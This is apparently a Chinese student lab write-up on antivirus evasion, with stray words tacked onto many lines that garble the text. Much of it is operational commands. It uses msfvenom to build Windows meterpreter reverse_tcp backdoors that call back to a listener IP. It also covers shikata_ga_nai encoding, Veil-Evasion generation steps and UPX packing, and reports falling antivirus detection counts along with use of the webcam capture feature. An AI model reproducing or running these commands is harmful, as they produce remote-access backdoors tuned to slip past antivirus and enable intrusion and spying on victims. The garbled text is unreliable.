linux终端:python
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor.exe
(linux的ip地址)linux
将生成的后门文件上传到virscan网站扫描,发现有19个软件都能发现
shell
接下来咱们经过改变特征码的方法来实现免杀:windows
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor1.exe
然而并无什么用安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor2.exe
能够看出报毒的引擎减小到16个。效果彷佛并无那么明显,根据课上所学,多是由于编码以后老是会有差很少相似的头部来解释如何将文件还原,而杀毒软件恰好就利用这一特征进行杀毒,因此仍是特征码的问题。网络
veil-Evasion是一个与Metasploit有点相似的软件,已经在kali虚拟机里,若是没有能够进行在线安装:sudo apt-get install veil-evasiontcp
可是我没有成功,全部接下来的这部分实验是用同窗的电脑完成的学习
在终端下输入指令veil
便可打开软件,根据提示依次键入如下指令:网站
use python/meterpreter/rev_tcp
//设置payload编码
set LHOST 172.30.6.226
//设置反弹链接IP
set port 4308
//设置反弹端口4308
generate
//生成
backdoor3
//程序名
1
生成的文件能够在 其余位置->电脑 里按照它提示的目录找到
检测以后发现报毒软件少了不少,但仍是有。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.130 LPORT=4308 -f c
试一下上次没成功的拍照功能
此次成功了
只有少数软件报毒,和以前的19个仍是有很明显的对比的。
再送去360看看(专门查杀这个exe文件)
真是一如既往的让人难过,没有任何反应。
直接用upx将以前生成的c.exe文件加壳,改个文件名
送去查杀
报毒软件又少了一个。虽然还不太明白加壳是什么意思,可是能看到有一点点免杀的做用。